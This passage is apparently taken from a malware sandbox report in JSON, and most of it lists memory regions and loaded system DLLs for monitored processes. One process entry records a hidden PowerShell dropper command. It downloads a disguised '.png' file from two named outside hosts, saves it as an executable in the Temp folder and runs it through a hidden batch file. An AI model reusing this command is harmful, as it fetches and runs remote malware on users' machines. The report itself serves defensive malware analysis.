"timestamp": "00:00:36.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_461", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:36.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_462", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:36.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 8791624318976, "type": "region", "version": 1 }, "end_va": 8791624351743, "entry_point": 8791624318976, "filename": "\\Windows\\System32\\winbrand.dll", "id": "region_463", "name": "winbrand.dll", "norm_filename": "c:\\windows\\system32\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 8791624318976, "timestamp": "00:00:36.879", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_464", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:00:36.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_465", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:00:36.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_466", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:00:36.890", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_467", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:00:36.890", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 815103, "entry_point": 0, "filename": null, "id": "region_468", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:36.937", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 860159, "entry_point": 0, "filename": null, "id": "region_469", "name": "pagefile_0x00000000000d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 851968, "timestamp": "00:00:36.937", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000470-addr_0x00000000000e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_30", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 0, "filename": null, "id": "region_470", "name": "private_0x00000000000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 917504, "timestamp": "00:00:36.937", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000471-addr_0x00000000000f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_31", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 987135, "entry_point": 0, "filename": null, "id": "region_471", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:36.937", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000472-addr_0x0000000000230000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_32", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 3342335, "entry_point": 0, "filename": null, "id": "region_472", "name": "private_0x0000000000230000", "norm_filename": null, "region_type": "private_memory", "start_va": 2293760, "timestamp": "00:00:36.939", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4653056, "type": "region", "version": 1 }, "end_va": 6258687, "entry_point": 0, "filename": null, "id": "region_473", "name": "pagefile_0x0000000000470000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4653056, "timestamp": "00:00:36.942", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000474-addr_0x0000000000620000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_33", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6488063, "entry_point": 0, "filename": null, "id": "region_474", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:00:36.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 8065023, "entry_point": 0, "filename": null, "id": "region_475", "name": "pagefile_0x0000000000630000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6488064, "timestamp": "00:00:36.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_476", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": "00:00:36.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 32518143, "entry_point": 0, "filename": null, "id": "region_477", "name": "pagefile_0x0000000001bc0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 29097984, "timestamp": "00:00:36.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_478", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:00:36.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_479", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:00:36.944", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 32571392, "type": "region", "version": 1 }, "end_va": 35516415, "entry_point": 32571392, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_480", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 32571392, "timestamp": "00:00:37.042", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "PowerShell \"'PowerShell \"\"function mihyr8([String] $yxuinzaisib){(New-Object System.Net.WebClient).DownloadFile($yxuinzaisib,''C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe'');Start-Process ''C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mvmubw.exe'';}try{mihyr8(''http://www.events4u.cz/kas23.png'')}catch{mihyr8(''http://tregartha-dinnie.co.uk/kas23.png'')}'\"\" | Out-File -encoding ASCII -FilePath C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mbovxo.bat;Start-Process 'C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\Mbovxo.bat' -WindowStyle Hidden\"", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_3", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 3, "origin_monitor_id": 2, "ref_parent_process": { "ref_id": "proc_2", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000003-region_00000481-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_34", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_481", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:37.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_482", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:37.187", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_483", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:37.187", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000484-addr_0x0000000000090000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_35", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_484", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:00:37.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_485", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:00:37.188", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_486", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:37.189", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000487-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_36", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_487", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:37.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5367988224, "type": "region", "version": 1 }, "end_va": 5368475647, "entry_point": 5367988224, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_488", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5367988224, "timestamp": "00:00:37.189", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_489", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:00:37.206", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_490", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:00:37.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000491-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_37", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_491", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:00:37.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000492-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_38", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_492", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:00:37.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000493-addr_0x0000000000240000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_39", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 3407871, "entry_point": 0, "filename": null, "id": "region_493", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:00:37.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_494", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:00:37.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_495", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:00:37.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_496", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:37.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_497", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:37.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1535999, "entry_point": 1114112, "filename": "\\Windows\\System32\\locale.nls", "id": "region_498", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1114112, "timestamp": "00:00:37.346", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000499-addr_0x00000000001d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_40", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 1966079, "entry_point": 0, "filename": null, "id": "region_499", "name": "private_0x00000000001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1900544, "timestamp": "00:00:37.347", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000500-addr_0x0000000000340000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_41", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 0, "filename": null, "id": "region_500", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:00:37.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_501", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:00:37.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_502", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:37.348", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_503", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:37.348", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791599480832, "type": "region", "version": 1 }, "end_va": 8791599935487, "entry_point": 8791599485236, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_504", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791599480832, "timestamp": "00:00:37.348", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791723540480, "type": "region", "version": 1 }, "end_va": 8791723642879, "entry_point": 8791723540480, "filename": "\\Windows\\System32\\atl.dll", "id": "region_505", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791723540480, "timestamp": "00:00:37.349", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791756505088, "type": "region", "version": 1 }, "end_va": 8791757737983, "entry_point": 8791756827984, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_506", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791756505088, "timestamp": "00:00:37.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791759257600, "type": "region", "version": 1 }, "end_va": 8791760154623, "entry_point": 8791759390560, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_507", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791759257600, "timestamp": "00:00:37.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_508", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:00:37.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_509", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:00:37.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_510", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:00:37.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791779049472, "type": "region", "version": 1 }, "end_va": 8791781158911, "entry_point": 8791779193648, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_511", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791779049472, "timestamp": "00:00:37.364", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791784095744, "type": "region", "version": 1 }, "end_va": 8791784558591, "entry_point": 8791784168992, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_512", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791784095744, "timestamp": "00:00:37.365", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_513", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:00:37.365", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791787368447, "entry_point": 8791787266280, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_514", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:00:37.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791787372544, "type": "region", "version": 1 }, "end_va": 8791788253183, "entry_point": 8791787385460, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_515", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791787372544, "timestamp": "00:00:37.366", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No 